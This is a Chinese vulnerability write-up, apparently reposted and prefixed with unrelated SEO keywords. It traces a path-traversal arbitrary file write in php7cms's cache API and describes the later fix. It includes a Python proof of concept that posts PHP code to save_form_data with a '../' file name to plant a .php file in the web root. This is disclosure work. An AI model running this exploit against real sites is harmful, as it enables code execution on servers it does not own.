个人信息网站建设方案书框架栏目,免费快速建站工具,个人网站免费申请,网页价格是什么意思Version:2018-10-09//最新版中以修复此漏洞这个漏洞很简单#xff0c;如果作者在写代码的时候考虑到一点点安全方面#xff0c;其实都可以避免的。[PHP] 纯文本查看 复制代码// php7cms/Core/Controllers/Api/Api.php// 52~61 linepublic function save_form_data() {$rt \P…Version:2018-10-09//最新版中以修复此漏洞这个漏洞很简单如果作者在写代码的时候考虑到一点点安全方面其实都可以避免的。[PHP] 纯文本查看 复制代码// php7cms/Core/Controllers/Api/Api.php// 52~61 linepublic function save_form_data() {$rt \Phpcmf\Service::L(cache)-init(file)-save(\Phpcmf\Service::L(Input)-get(name),\Phpcmf\Service::L(Input)-post(data),7200);var_dump($rt);exit;}调用了Cache类中 init 函数参数分别为get(‘name’)和post(‘data’)。[PHP] 纯文本查看 复制代码// php7cms/Fcms/Library/Cache.php// 112~121 linepublic function init($handler , $prefix site-.SITE_ID.-) {$config new \Config\Cache();$config-handler file;$config-prefix $prefix;!$config-prefix $config-prefix site-.SITE_ID.-;$config-path WRITEPATH.caching/;$cache \Config\Services::cache($config, 0);return $cache;}初始化缓存类为prefix参数拼接字符串后直接无任何过滤直接传入CI框架的缓存类中中间框架的执行流程就不在文章里写了。直接看最后一步[PHP] 纯文本查看 复制代码// php7cms/System/Cache/Handlers// 107~125 linepublic function save(string $key, $value, int $ttl 60){$key $this-prefix . $key;$contents [time time(),ttl $ttl,data $value,];if ($this-writeFile($this-path . $key, serialize($contents))){chmod($this-path . $key, 0640);return true;}return false;}[PHP] 纯文本查看 复制代码//324~345 lineprotected function writeFile($path, $data, $mode wb){if (($fp fopen($path, $mode)) false){return false;}flock($fp, LOCK_EX);for ($result $written 0, $length strlen($data); $written $length; $written $result){if (($result fwrite($fp, substr($data, $written))) false){break;}}flock($fp, LOCK_UN);fclose($fp);return is_int($result);}直接写入到缓存目录中其中并没有过滤”.”和”/”可以跨目录写入。所以不需要考虑路由问题。POC[PHP] 纯文本查看 复制代码from requests import postpostData {data:?php phpinfo()?}postTest post(http://localhost//index.php?sapicapimsave_form_dataname/../../../adminss.php,datapostData)-1.png (123.79 KB, 下载次数: 23)2018-12-14 13:05 上传新版修复:3.png (27.21 KB, 下载次数: 28)2018-12-14 13:07 上传首先给dr_safe_replace 参数增加了两个新的过滤条件 ” . “和 ” ‘ “在原本漏洞出发点接收get值的时候用这个函数过滤。03.png (35.6 KB, 下载次数: 26)2018-12-14 13:07 上传
